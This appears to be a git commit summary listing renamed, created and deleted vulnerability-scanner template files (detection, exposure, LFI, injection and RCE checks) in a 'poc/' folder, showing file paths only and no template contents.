poc/detect/prtg-detect-9706.yaml rename poc/detect/{puppetdb-detect-9718.yaml => puppetdb-detect-9719.yaml} (100%) create mode 100644 poc/detect/puppetdb-detect.yaml delete mode 100644 poc/detect/puppetserver-detect.yaml delete mode 100644 poc/detect/rdp-detect-9840.yaml create mode 100644 poc/detect/rdp-detect.yaml delete mode 100644 poc/detect/rhymix-cms-detect-9878.yaml rename poc/detect/{rhymix-cms-detect.yaml => rhymix-cms-detect-9879.yaml} (100%) delete mode 100644 poc/detect/s3-detect-9965.yaml delete mode 100644 poc/detect/sap-netweaver-detect-10047.yaml create mode 100644 poc/detect/sap-recon-detect-10062.yaml delete mode 100644 poc/detect/sap-recon-detect-10063.yaml delete mode 100644 poc/detect/secmail-detect-10112.yaml rename poc/detect/{shiro-detect.yaml => shiro-detect-10196.yaml} (100%) create mode 100644 poc/detect/shopware-detect-10211.yaml create mode 100644 poc/detect/shopware-detect.yaml delete mode 100644 poc/detect/smartstore-detect-10333.yaml create mode 100644 poc/detect/sonicwall-email-security-detect-10384.yaml delete mode 100644 poc/detect/sonicwall-email-security-detect.yaml delete mode 100644 poc/detect/strapi-cms-detect.yaml delete mode 100644 poc/detect/tech-detect-10674.yaml delete mode 100644 poc/detect/telerik-fileupload-detect-10695.yaml create mode 100644 poc/detect/totemomail-smtp-detect.yaml rename poc/detect/{unauthorized-puppet-node-manager-detect-10958.yaml => unauthorized-puppet-node-manager-detect-10959.yaml} (100%) create mode 100644 poc/detect/virtual-ema-detect-11024.yaml delete mode 100644 poc/detect/virtual-ema-detect-11025.yaml delete mode 100644 poc/detect/vmware-version-detect-11054.yaml rename poc/detect/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect-11058.yaml} (100%) create mode 100644 poc/detect/vmware-vrealize-detect.yaml delete mode 100644 poc/detect/vsftpd-detection-11076.yaml delete mode 100644 poc/detect/waf-detect-11089.yaml rename poc/detect/{wamp-xdebug-detect-11103.yaml => wamp-xdebug-detect-11100.yaml} (100%) create mode 100644 poc/detect/wazuh-detect-11111.yaml delete mode 100644 poc/detect/weave-scope-dashboard-detect-11118.yaml create mode 100644 poc/detect/werkzeug-debugger-detect-11196.yaml delete mode 100644 poc/detect/werkzeug-debugger-detect-11197.yaml create mode 100644 poc/detect/wondercms-detect-11223.yaml rename poc/detect/{wondercms-detect-11222.yaml => wondercms-detect.yaml} (100%) rename poc/detect/{worksites-detection.yaml => worksites-detection-11385.yaml} (100%) delete mode 100644 poc/detect/wuzhicms-detect.yaml create mode 100644 poc/detect/yapi-detect-11720.yaml delete mode 100644 poc/detect/zentao-detect-11785.yaml create mode 100644 poc/detect/zentao-detect-11787.yaml delete mode 100644 poc/detect/zm-system-log-detect-11833.yaml create mode 100644 poc/detect/zm-system-log-detect-11834.yaml create mode 100644 poc/directory_listing/carel-bacnet-gateway-traversal-858.yaml delete mode 100644 poc/directory_listing/carel-bacnet-gateway-traversal.yaml delete mode 100644 poc/directory_listing/digitalrebar-traversal.yaml create mode 100644 poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml create mode 100644 poc/directory_listing/elfinder-path-traversal-7203.yaml rename poc/directory_listing/{finereport-path-traversal.yaml => finereport-path-traversal-7476.yaml} (100%) create mode 100644 poc/directory_listing/flir-path-traversal-7519.yaml delete mode 100644 poc/directory_listing/flir-path-traversal-7521.yaml create mode 100644 poc/directory_listing/natshell-path-traversal.yaml create mode 100644 poc/directory_listing/nginx-merge-slashes-path-traversal-9105.yaml delete mode 100644 poc/directory_listing/nginx-merge-slashes-path-traversal.yaml delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9179.yaml delete mode 100644 poc/directory_listing/pmb-directory-traversal-9613.yaml create mode 100644 poc/directory_listing/pmb-directory-traversal.yaml delete mode 100644 poc/directory_listing/tpshop-directory-traversal-10821.yaml create mode 100644 poc/directory_listing/tpshop-directory-traversal-10822.yaml create mode 100644 poc/directory_listing/wooyun-path-traversal-11229.yaml delete mode 100644 poc/directory_listing/wooyun-path-traversal-11232.yaml delete mode 100644 poc/docker/amazon-docker-config-280.yaml delete mode 100644 poc/docker/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/docker/amazon-docker-config.yaml create mode 100644 poc/docker/aws-ecs-container-agent-tasks-640.yaml create mode 100644 poc/docker/docker-compose-config-7059.yaml create mode 100644 poc/docker/dockercfg-config-7056.yaml delete mode 100644 poc/docker/dockercfg-config.yaml create mode 100644 poc/docker/kubernetes-enterprise-manager-8529.yaml delete mode 100644 poc/docker/kubernetes-enterprise-manager-8530.yaml delete mode 100644 poc/docker/kubernetes-kustomization-disclosure-8533.yaml delete mode 100644 poc/docker/kubernetes-metrics.yaml delete mode 100644 poc/docker/kubernetes-mirantis-8538.yaml create mode 100644 poc/docker/kubernetes-pods-8542.yaml delete mode 100644 poc/docker/kubernetes-pods-8546.yaml rename poc/docker/{kubernetes-unauth(1).yaml => kubernetes-unauth.yaml} (100%) rename poc/drupal/{drupal-install-7107.yaml => drupal-install-7105.yaml} (100%) rename poc/drupal/{drupal-user-enum-ajax.yaml => drupal-user-enum-ajax-7109.yaml} (100%) create mode 100644 poc/drupal/drupal-user-enum-ajax-7110.yaml delete mode 100644 poc/drupal/drupal-user-enum-redirect-7114.yaml create mode 100644 poc/drupal/drupal-user-enum-redirect-7115.yaml delete mode 100644 poc/elk/elasticsearch-7193.yaml create mode 100644 poc/elk/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/elk/elasticsearch-sql-client-detect.yaml create mode 100644 poc/elk/kibana-panel-8485.yaml delete mode 100644 poc/exposed/active-admin-exposure-41.yaml create mode 100644 poc/exposed/active-admin-exposure-43.yaml delete mode 100644 poc/exposed/adobe-connect-username-exposure-100.yaml rename poc/exposed/{adobe-connect-username-exposure-101.yaml => adobe-connect-username-exposure-98.yaml} (100%) delete mode 100644 poc/exposed/airflow-configuration-exposure-230.yaml create mode 100644 poc/exposed/airflow-configuration-exposure.yaml delete mode 100644 poc/exposed/amazon-docker-config-disclosure-278.yaml delete mode 100644 poc/exposed/ambari-exposure-291.yaml create mode 100644 poc/exposed/ambari-exposure-293.yaml create mode 100644 poc/exposed/android-debug-database-exposed-314.yaml create mode 100644 poc/exposed/ansible-config-disclosure-326.yaml delete mode 100644 poc/exposed/ansible-config-disclosure.yaml create mode 100644 poc/exposed/ansible-tower-exposure-329.yaml delete mode 100644 poc/exposed/ansible-tower-exposure-332.yaml create mode 100644 poc/exposed/appspec-yml-disclosure-529.yaml delete mode 100644 poc/exposed/avtech-dvr-exposure-616.yaml create mode 100644 poc/exposed/avtech-dvr-exposure-617.yaml delete mode 100644 poc/exposed/axiom-digitalocean-key-exposure-666.yaml rename poc/exposed/{axiom-digitalocean-key-exposure.yaml => axiom-digitalocean-key-exposure-668.yaml} (100%) rename poc/exposed/{beward-ipcamera-disclosure.yaml => beward-ipcamera-disclosure-715.yaml} (100%) delete mode 100644 poc/exposed/beward-ipcamera-disclosure-717.yaml create mode 100644 poc/exposed/caucho-resin-info-disclosure-871.yaml rename poc/exposed/{caucho-resin-info-disclosure-872.yaml => caucho-resin-info-disclosure.yaml} (100%) create mode 100644 poc/exposed/cisco-meraki-exposure-944.yaml delete mode 100644 poc/exposed/cisco-meraki-exposure-946.yaml create mode 100644 poc/exposed/cisco-smi-exposure-971.yaml create mode 100644 poc/exposed/clockwork-dashboard-exposure-1014.yaml delete mode 100644 poc/exposed/coremail-config-disclosure-1215.yaml create mode 100644 poc/exposed/coremail-config-disclosure-1216.yaml delete mode 100644 poc/exposed/couchdb-exposure-1238.yaml create mode 100644 poc/exposed/couchdb-exposure-1239.yaml delete mode 100644 poc/exposed/credential-exposure-file.yaml rename poc/exposed/{credentials-disclosure-1252.yaml => credentials-disclosure.yaml} (100%) delete mode 100644 poc/exposed/exposed-alps-spring-7284.yaml create mode 100644 poc/exposed/exposed-alps-spring-7285.yaml create mode 100644 poc/exposed/exposed-authentication-asmx.yaml delete mode 100644 poc/exposed/exposed-gitignore-7305.yaml delete mode 100644 poc/exposed/exposed-glances-api-7308.yaml delete mode 100644 poc/exposed/exposed-glances-api-7309.yaml delete mode 100644 poc/exposed/exposed-hg-7312.yaml delete mode 100644 poc/exposed/exposed-jquery-file-upload.yaml delete mode 100644 poc/exposed/exposed-mysql-initial.yaml delete mode 100644 poc/exposed/exposed-nomad-7329.yaml create mode 100644 poc/exposed/exposed-prometheus-log-7333.yaml delete mode 100644 poc/exposed/exposed-redis-7336.yaml delete mode 100644 poc/exposed/exposed-service-now-7342.yaml create mode 100644 poc/exposed/exposed-service-now-7343.yaml create mode 100644 poc/exposed/exposed-svn-7351.yaml delete mode 100644 poc/exposed/exposed-svn-7352.yaml delete mode 100644 poc/exposed/exposed-zookeeper.yaml create mode 100644 poc/exposed/firebase-config-exposure-7487.yaml rename poc/exposed/{firebase-config-exposure-7485.yaml => firebase-config-exposure.yaml} (100%) rename poc/exposed/{flink-exposure-7511.yaml => flink-exposure-7509.yaml} (100%) delete mode 100644 poc/exposed/ftp-credentials-exposure-7568.yaml create mode 100644 poc/exposed/ftp-credentials-exposure.yaml rename poc/exposed/{github-workflows-disclosure-7664.yaml => github-workflows-disclosure-7665.yaml} (100%) delete mode 100644 poc/exposed/gogs-install-exposure-7755.yaml create mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml create mode 100644 poc/exposed/iceflow-vpn-disclosure-8127.yaml delete mode 100644 poc/exposed/iis-internal-ip-disclosure-8149.yaml rename poc/exposed/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8187.yaml} (100%) create mode 100644 poc/exposed/java-melody-exposed-8223.yaml rename poc/exposed/{jfrog-unauth-build-exposed-8302.yaml => jfrog-unauth-build-exposed-8299.yaml} (100%) rename poc/exposed/{jolokia-info-disclosure-8358.yaml => jolokia-info-disclosure-8359.yaml} (100%) delete mode 100644 poc/exposed/kubernetes-kustomization-disclosure-8533.yaml create mode 100644 poc/exposed/kyan-network-credentials-disclosure-8556.yaml create mode 100644 poc/exposed/lvmeng-uts-disclosure-8681.yaml delete mode 100644 poc/exposed/magento-config-disclosure.yaml delete mode 100644 poc/exposed/monitorix-exposure-8929.yaml create mode 100644 poc/exposed/monitorix-exposure-8933.yaml create mode 100644 poc/exposed/openbmcs-secret-disclosure-9260.yaml delete mode 100644 poc/exposed/openbmcs-secret-disclosure.yaml delete mode 100644 poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml delete mode 100644 poc/exposed/pgadmin-exposure-9490.yaml create mode 100644 poc/exposed/pgadmin-exposure-9491.yaml create mode 100644 poc/exposed/putty-private-key-disclosure-9731.yaml delete mode 100644 poc/exposed/putty-private-key-disclosure-9732.yaml create mode 100644 poc/exposed/pyproject-disclosure-9738.yaml rename poc/exposed/{pyproject-disclosure-9737.yaml => pyproject-disclosure.yaml} (100%) rename poc/exposed/{rails-secret-token-disclosure-9809.yaml => rails-secret-token-disclosure-9810.yaml} (100%) create mode 100644 poc/exposed/rocketmq-console-exposure-9892.yaml delete mode 100644 poc/exposed/rocketmq-console-exposure-9894.yaml rename poc/exposed/{selenium-exposure-10138.yaml => selenium-exposure-10137.yaml} (100%) delete mode 100644 poc/exposed/sensitive-storage-exposure-10143.yaml create mode 100644 poc/exposed/sensitive-storage-exposure-10144.yaml delete mode 100644 poc/exposed/setup-page-exposure-10181.yaml rename poc/exposed/{snyk-ignore-file-disclosure-10348.yaml => snyk-ignore-file-disclosure-10347.yaml} (100%) delete mode 100644 poc/exposed/solr-exposure-10363.yaml create mode 100644 poc/exposed/solr-exposure-10364.yaml create mode 100644 poc/exposed/thinkphp-509-information-disclosure-10753.yaml create mode 100644 poc/exposed/thumbs-db-disclosure-10761.yaml delete mode 100644 poc/exposed/thumbs-db-disclosure-10763.yaml create mode 100644 poc/exposed/tugboat-config-exposure-10844.yaml delete mode 100644 poc/exposed/watchguard-credentials-disclosure.yaml delete mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml create mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml delete mode 100644 poc/exposed/wp-full-path-disclosure-11455.yaml create mode 100644 poc/exposed/wp-full-path-disclosure-11457.yaml rename poc/exposed/{yarn-manager-exposure-11731.yaml => yarn-manager-exposure-11733.yaml} (100%) delete mode 100644 poc/extract/extract-urls-7370.yaml create mode 100644 poc/favicon/favicon-detection-7443.yaml delete mode 100644 poc/ftp/crush-ftp-login-1273.yaml create mode 100644 poc/ftp/crush-ftp-login-1275.yaml delete mode 100644 poc/ftp/ftp-credentials-exposure-7568.yaml create mode 100644 poc/ftp/ftp-credentials-exposure.yaml delete mode 100644 poc/ftp/ftp-default-creds.yaml delete mode 100644 poc/ftp/ftpconfig-7565.yaml create mode 100644 poc/ftp/ftpconfig.yaml create mode 100644 poc/ftp/proftpd-config-9667.yaml delete mode 100644 poc/ftp/proftpd-config.yaml delete mode 100644 poc/ftp/vsftpd-detection-11076.yaml rename poc/fuzz/{fuzz-query.yaml => fuzz-mode.yaml} (100%) create mode 100644 poc/fuzz/lfi-linux-fuzz.yaml rename poc/fuzz/{0xlfifuzz1.yaml => linux-lfi-fuzzing.yaml} (100%) delete mode 100644 poc/gcloud/gcp-service-account-11851.yaml create mode 100644 poc/gcloud/gcp-service-account-7575.yaml rename poc/git/{api-gitlab.yaml => api-gitlab.yml} (100%) delete mode 100644 poc/git/axiom-digitalocean-key-exposure-666.yaml rename poc/git/{axiom-digitalocean-key-exposure.yaml => axiom-digitalocean-key-exposure-668.yaml} (100%) delete mode 100644 poc/git/digitalrebar-traversal.yaml delete mode 100644 poc/git/exposed-gitignore-7305.yaml delete mode 100644 poc/git/git-config-7633.yaml create mode 100644 poc/git/git-config-7638.yaml create mode 100644 poc/git/git-config-nginxoffbyslash-7628.yaml delete mode 100644 poc/git/git-credentials-7643.yaml create mode 100644 poc/git/git-credentials-7644.yaml delete mode 100644 poc/git/github-enterprise-detect-7649.yaml delete mode 100644 poc/git/github-gemfile-files-7653.yaml rename poc/git/{github-gemfile-files-7652.yaml => github-gemfile-files.yaml} (100%) delete mode 100644 poc/git/github-page-config.yaml rename poc/git/{github-workflows-disclosure-7664.yaml => github-workflows-disclosure-7665.yaml} (100%) create mode 100644 poc/git/gitlab-api-user-enum-7668.yaml delete mode 100644 poc/git/gitlab-public-repos-7675.yaml create mode 100644 poc/git/gitlab-public-signup-7681.yaml rename poc/git/{gitlab-public-snippets.yaml => gitlab-public-snippets-7685.yaml} (100%) delete mode 100644 poc/git/gitlab-public-snippets-7690.yaml create mode 100644 poc/git/gitlab-rce.yaml delete mode 100644 poc/git/gitlab-user-enum-7700.yaml delete mode 100644 poc/git/gitlab-user-enumeration-7697.yaml create mode 100644 poc/git/gitlab-user-enumeration-7698.yaml create mode 100644 poc/git/gitlab-weak-login-7705.yaml delete mode 100644 poc/git/metadata-digitalocean-8818.yaml delete mode 100644 poc/google/google-api-7771.yaml create mode 100644 poc/google/google-bucket-service.yaml rename poc/google/{google-earth-dlogin.yaml => google-earth-dlogin-7780.yaml} (100%) rename poc/{social/facebook-secrets.yaml => google/google-secrets.yaml} (100%) delete mode 100644 poc/google/google-storage.yaml create mode 100644 poc/graphql/graphql-array-batching.yaml delete mode 100644 poc/graphql/graphql-detect-7831.yaml delete mode 100644 poc/graphql/graphql-field-suggestion.yaml delete mode 100644 poc/graphql/hasura-graphql-psql-exec-7902.yaml create mode 100644 poc/graphql/hasura-graphql-psql-exec.yaml delete mode 100644 poc/graphql/hasura-graphql-ssrf-7905.yaml create mode 100644 poc/header/http-missing-security-headers.yaml delete mode 100644 poc/header/log4j-all-headers.yaml rename poc/header/{oob-header-based-interaction.yaml => oob-header-based-interaction-9250.yaml} (100%) delete mode 100644 poc/header/sqliheader.yaml create mode 100644 poc/http/http-missing-security-headers.yaml rename poc/http/{http-raw.yaml => http-raw-multiple.yaml} (100%) create mode 100644 poc/http/httpbin-open-redirect-8047.yaml delete mode 100644 poc/http/httpbin-open-redirect.yaml delete mode 100644 poc/http/httpbin-xss-8052.yaml create mode 100644 poc/http/httpbin-xss.yaml delete mode 100644 poc/http/ibm-http-server.yaml delete mode 100644 poc/http/lighttpd-default-8627.yaml delete mode 100644 poc/http/springboot-httptrace-10468.yaml create mode 100644 poc/ibm/ibm-advanced-system-management-8090.yaml delete mode 100644 poc/ibm/ibm-http-server.yaml create mode 100644 poc/ibm/ibm-mqseries-default-login-8106.yaml delete mode 100644 poc/ibm/ibm-mqseries-default-login-8107.yaml delete mode 100644 poc/ibm/ibm-note-login-8110.yaml create mode 100644 poc/ibm/ibm-note-login-8111.yaml delete mode 100644 poc/ibm/ibm-service-assistant-8116.yaml delete mode 100644 poc/injection/buffalo-config-injection-798.yaml rename poc/injection/{buffalo-config-injection-800.yaml => buffalo-config-injection-801.yaml} (100%) delete mode 100644 poc/injection/crlf-injection-1260.yaml create mode 100644 poc/injection/crlf-injection-1262.yaml create mode 100644 poc/injection/duomicms-sql-injection-7122.yaml delete mode 100644 poc/injection/error-based-sql-injection-7249.yaml create mode 100644 poc/injection/glpi-9.3.3-sql-injection.yaml delete mode 100644 poc/injection/host-header-injection-8000.yaml rename poc/{header/host-header-injection-8000.yaml => injection/host-header-injection-8002.yaml} (100%) create mode 100644 poc/injection/simple-crm-sql-injection-10278.yaml delete mode 100644 poc/injection/viewlinc-crlf-injection-11014.yaml create mode 100644 poc/injection/yongyou-u8-RegisterServlet-sql-Injection.yaml create mode 100644 poc/java/apache-tomcat-snoop-377.yaml delete mode 100644 poc/java/default-glassfish-server-page-6852.yaml create mode 100644 poc/java/ecology-springframework-directory-traversal-7174.yaml delete mode 100644 poc/java/exposed-alps-spring-7284.yaml create mode 100644 poc/java/exposed-alps-spring-7285.yaml create mode 100644 poc/java/java-melody-exposed-8223.yaml delete mode 100644 poc/java/jboss-seam-debug-page-8239.yaml create mode 100644 poc/java/jboss-seam-debug-page-8240.yaml create mode 100644 poc/java/jboss-status-8241.yaml create mode 100644 poc/java/jetty-showcontexts-enable-8297.yaml create mode 100644 poc/java/jetty-showcontexts-enable-8298.yaml delete mode 100644 poc/java/jinfornet-jreport-lfi-8307.yaml rename poc/java/{shiro-detect.yaml => shiro-detect-10196.yaml} (100%) create mode 100644 poc/java/springboot-actuator-10434.yaml delete mode 100644 poc/java/springboot-autoconfig.yaml delete mode 100644 poc/java/springboot-beans-10438.yaml create mode 100644 poc/java/springboot-beans-10439.yaml delete mode 100644 poc/java/springboot-configprops-10443.yaml create mode 100644 poc/java/springboot-configprops-10444.yaml rename poc/java/{springboot-dump-10447.yaml => springboot-dump.yaml} (100%) delete mode 100644 poc/java/springboot-gateway-10452.yaml create mode 100644 poc/java/springboot-gateway-10453.yaml delete mode 100644 poc/java/springboot-h2-db-rce-10454.yaml rename poc/java/{springboot-h2-db-rce.yaml => springboot-h2-db-rce-10455.yaml} (100%) rename poc/java/{springboot-heapdump-10465.yaml => springboot-heapdump-10461.yaml} (100%) delete mode 100644 poc/java/springboot-httptrace-10468.yaml delete mode 100644 poc/java/springboot-log4j-rce.yaml create mode 100644 poc/java/springboot-metrics-10482.yaml create mode 100644 poc/java/struts-problem-report-10563.yaml delete mode 100644 poc/java/tomcat-manager-pathnormalization-10796.yaml create mode 100644 poc/java/tomcat-scripts-10803.yaml delete mode 100644 poc/java/weblogic-weak-login.yaml create mode 100644 poc/javascript/aem-querybuilder-json-servlet-182.yaml create mode 100644 poc/javascript/bower-json-769.yaml create mode 100644 poc/javascript/express-lfr-json (copy 1).yaml create mode 100644 poc/javascript/fastjson-1-2-41-rce.yaml create mode 100644 poc/javascript/fastjson-1-2-47-rce-7415.yaml create mode 100644 poc/javascript/fastjson-1-2-67-rce.yaml delete mode 100644 poc/javascript/fastjson-1-2-68-rce-7425.yaml create mode 100644 poc/javascript/keycloak-json-8473.yaml rename poc/javascript/{package-json-9422.yaml => package-json.yaml} (100%) create mode 100644 poc/jenkins/jenkins-asyncpeople-8269.yaml delete mode 100644 poc/jenkins/jenkins-default-8271.yaml create mode 100644 poc/jenkins/jenkins-default-login.yaml delete mode 100644 poc/jenkins/jenkins-login-8277.yaml create mode 100644 poc/jenkins/jenkins-login-8279.yaml mode change 100644 => 100755 poc/jenkins/jenkins-weak-password.yaml mode change 100644 => 100755 poc/joomla/joomla-config-dist-file.yaml create mode 100644 poc/joomla/joomla-config-file-8376.yaml rename poc/joomla/{joomla-config-file-8375.yaml => joomla-config-file.yaml} (100%) create mode 100644 poc/joomla/joomla-file-listing.yaml create mode 100644 poc/kafka/kafka-center-default-login-8416.yaml create mode 100644 poc/kafka/kafka-connect-ui-8420.yaml delete mode 100644 poc/kafka/kafka-connect-ui-8423.yaml create mode 100644 poc/kafka/kafka-consumer-monitor-8424.yaml delete mode 100644 poc/kafka/kafka-consumer-monitor-8425.yaml delete mode 100644 poc/kafka/kafka-cruise-control-8426.yaml delete mode 100644 poc/kafka/kafka-monitoring-8430.yaml create mode 100644 poc/kafka/kafka-monitoring-8431.yaml delete mode 100644 poc/kafka/kafka-topics-ui-8432.yaml create mode 100644 poc/kafka/kafka-topics-ui-8435.yaml rename poc/laravel/{laravel-filemanager-lfi.yaml => laravel-filemanager-lfi-8588.yaml} (100%) create mode 100644 poc/laravel/laravel-telescope-8601.yaml rename poc/local_file_inclusion/{accent-microcomputers-lfi-14.yaml => accent-microcomputers-lfi-17.yaml} (100%) create mode 100644 poc/local_file_inclusion/ad-widget-lfi-124.yaml delete mode 100644 poc/local_file_inclusion/amministrazione-aperta-lfi-303.yaml create mode 100644 poc/local_file_inclusion/amministrazione-aperta-lfi.yaml create mode 100644 poc/local_file_inclusion/bems-api-lfi-707.yaml rename poc/local_file_inclusion/{bems-api-lfi-711.yaml => bems-api-lfi-712.yaml} (100%) create mode 100644 poc/local_file_inclusion/brandfolder-lfi-776.yaml create mode 100644 poc/local_file_inclusion/bullwark-momentum-lfi.yaml delete mode 100644 poc/local_file_inclusion/candidate-application-lfi-850.yaml rename poc/local_file_inclusion/{cherry-lfi-902.yaml => cherry-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/church-admin-lfi-914.yaml rename poc/local_file_inclusion/{churchope-lfi.yaml => churchope-lfi-915.yaml} (100%) delete mode 100644 poc/local_file_inclusion/churchope-lfi-916.yaml rename poc/local_file_inclusion/{cs-cart-unauthenticated-lfi.yaml => cs-cart-unauthenticated-lfi-1281.yaml} (100%) delete mode 100644 poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml delete mode 100644 poc/local_file_inclusion/dicoogle-pacs-lfi.yaml create mode 100644 poc/local_file_inclusion/elfinder-path-traversal-7203.yaml delete mode 100644 poc/local_file_inclusion/generic-windows-lfi-7591.yaml delete mode 100644 poc/local_file_inclusion/global-domains-lfi.yaml delete mode 100644 poc/local_file_inclusion/goip-1-lfi-7764.yaml create mode 100644 poc/local_file_inclusion/groupoffice-lfi-7849.yaml delete mode 100644 poc/local_file_inclusion/groupoffice-lfi-7850.yaml delete mode 100644 poc/local_file_inclusion/gsoap-lfi.yaml create mode 100644 poc/local_file_inclusion/hrsale-unauthenticated-lfi-8039.yaml delete mode 100644 poc/local_file_inclusion/hrsale-unauthenticated-lfi.yaml create mode 100644 poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml create mode 100644 poc/local_file_inclusion/issuu-panel-lfi.yaml delete mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml delete mode 100644 poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml create mode 100644 poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml rename poc/local_file_inclusion/{laravel-filemanager-lfi.yaml => laravel-filemanager-lfi-8588.yaml} (100%) create mode 100644 poc/local_file_inclusion/lfi-linux-fuzz.yaml rename poc/local_file_inclusion/{0xlfifuzz1.yaml => linux-lfi-fuzzing.yaml} (100%) create mode 100644 poc/local_file_inclusion/magicflow-lfi.yaml rename poc/local_file_inclusion/{moodle-filter-jmol-lfi-8938.yaml => moodle-filter-jmol-lfi-8937.yaml} (100%) delete mode 100644 poc/local_file_inclusion/mthemeunus-lfi-8971.yaml delete mode 100644 poc/local_file_inclusion/oliver-library-lfi.yaml create mode 100644 poc/local_file_inclusion/opensis-lfi.yaml delete mode 100644 poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml delete mode 100644 poc/local_file_inclusion/pacsone-server-lfi-9428.yaml delete mode 100644 poc/local_file_inclusion/phpwiki-lfi.yaml delete mode 100644 poc/local_file_inclusion/qihang-media-lfi-9769.yaml create mode 100644 poc/local_file_inclusion/qihang-media-lfi.yaml create mode 100644 poc/local_file_inclusion/shortcode-lfi.yaml delete mode 100644 poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml create mode 100644 poc/local_file_inclusion/sniplets-lfi-10343.yaml create mode 100644 poc/local_file_inclusion/surrealtodo-lfi.yaml create mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10724.yaml create mode 100644 poc/local_file_inclusion/thinkcmf-lfi.yaml delete mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml delete mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi.yaml create mode 100644 poc/local_file_inclusion/wordpress-lfi(1).yaml delete mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml create mode 100644 poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml delete mode 100644 poc/local_file_inclusion/wp-memphis-documents-library-lfi-11498.yaml rename poc/local_file_inclusion/{wp-oxygen-theme-lfi-11523.yaml => wp-oxygen-theme-lfi.yaml} (100%) rename poc/local_file_inclusion/{wp-simple-fields-lfi.yaml => wp-simple-fields-lfi-11571.yaml} (100%) delete mode 100644 poc/local_file_inclusion/wp-socialfit-xss-11577.yaml create mode 100644 poc/local_file_inclusion/wp-tutor-lfi-11598.yaml rename poc/local_file_inclusion/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/wp-vault-lfi-11611.yaml create mode 100644 poc/local_file_inclusion/xerox-efi-lfi-11682.yaml delete mode 100644 poc/local_file_inclusion/xerox-efi-lfi-11683.yaml delete mode 100644 poc/local_file_inclusion/yishaadmin-lfi.yaml create mode 100644 poc/magento/magento-admin-panel-8690.yaml rename poc/magento/{magento-cacheleak.yaml => magento-cacheleak-8698.yaml} (100%) create mode 100644 poc/magento/magento-config-8702.yaml delete mode 100644 poc/magento/magento-config-disclosure.yaml delete mode 100644 poc/magento/magento-unprotected-dev-files-8708.yaml delete mode 100644 poc/microsoft/74cms-sqli-10.yaml create mode 100644 poc/microsoft/aims-password-mgmt-client-218.yaml create mode 100644 poc/microsoft/aims-password-mgmt-client-219.yaml delete mode 100644 poc/microsoft/aims-password-mgmt-client-221.yaml delete mode 100644 poc/microsoft/aims-password-portal-222.yaml create mode 100644 poc/microsoft/api-buttercms.yaml create mode 100644 poc/microsoft/bems-api-lfi-707.yaml rename poc/microsoft/{bems-api-lfi-711.yaml => bems-api-lfi-712.yaml} (100%) delete mode 100644 poc/microsoft/craft-cms-detect-1248.yaml create mode 100644 poc/microsoft/dedecms-carbuyaction-fileinclude.yaml delete mode 100644 poc/microsoft/dedecms-membergroup-sqli-6796.yaml delete mode 100644 poc/microsoft/default-microsoft-azure-page.yaml delete mode 100644 poc/microsoft/dotcms-admin-panel-7085.yaml create mode 100644 poc/microsoft/dotcms-admin-panel-7087.yaml create mode 100644 poc/microsoft/duomicms-sql-injection-7122.yaml create mode 100644 poc/microsoft/dzs-zoomsounds-listing.yaml rename poc/microsoft/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) delete mode 100644 poc/microsoft/empirecms-xss-7220.yaml delete mode 100644 poc/microsoft/feifeicms-lfr.yaml rename poc/microsoft/{fuelcms-default-login.yaml => fuelcms-default-login-7571.yaml} (100%) delete mode 100644 poc/microsoft/fuelcms-default-login-7572.yaml delete mode 100644 poc/microsoft/getsimple-cms-detector-7613.yaml create mode 100644 poc/microsoft/grav-cms-detect-7843.yaml rename poc/microsoft/{grav-cms-detect.yaml => grav-cms-detect-7844.yaml} (100%) create mode 100644 poc/microsoft/kevinlab-bems-sqli-8460.yaml delete mode 100644 poc/microsoft/kevinlab-bems-sqli.yaml create mode 100644 poc/microsoft/kiwitcms-login-8496.yaml delete mode 100644 poc/microsoft/kiwitcms-login-8497.yaml rename poc/microsoft/{lotuscms-rce-8652.yaml => lotuscms-rce-8653.yaml} (100%) create mode 100644 poc/microsoft/maccmsv10-backdoor-8683.yaml create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8853.yaml create mode 100644 poc/microsoft/microsoft-teams-webhook-8858.yaml rename poc/microsoft/{microsoft-teams-webhook-8856.yaml => microsoft-teams-webhook.yaml} (100%) delete mode 100644 poc/microsoft/ms-adcs-detect-8960.yaml create mode 100644 poc/microsoft/ms-adcs-detect-8961.yaml create mode 100644 poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml create mode 100644 poc/microsoft/myucms-lfr-8987.yaml delete mode 100644 poc/microsoft/netlify-cms-9039.yaml create mode 100644 poc/microsoft/netlify-cms-9041.yaml create mode 100644 poc/microsoft/octobercms-default-login-9192.yaml rename poc/microsoft/{octobercms-default-login-9193.yaml => octobercms-default-login.yaml} (100%) delete mode 100644 poc/microsoft/odoo-cms-redirect.yaml delete mode 100644 poc/microsoft/pbootcms-database-file-download-9469.yaml create mode 100644 poc/microsoft/powercreator-cms-rce-9644.yaml delete mode 100644 poc/microsoft/powercreator-cms-rce-9646.yaml delete mode 100644 poc/microsoft/rhymix-cms-detect-9878.yaml rename poc/microsoft/{rhymix-cms-detect.yaml => rhymix-cms-detect-9879.yaml} (100%) delete mode 100644 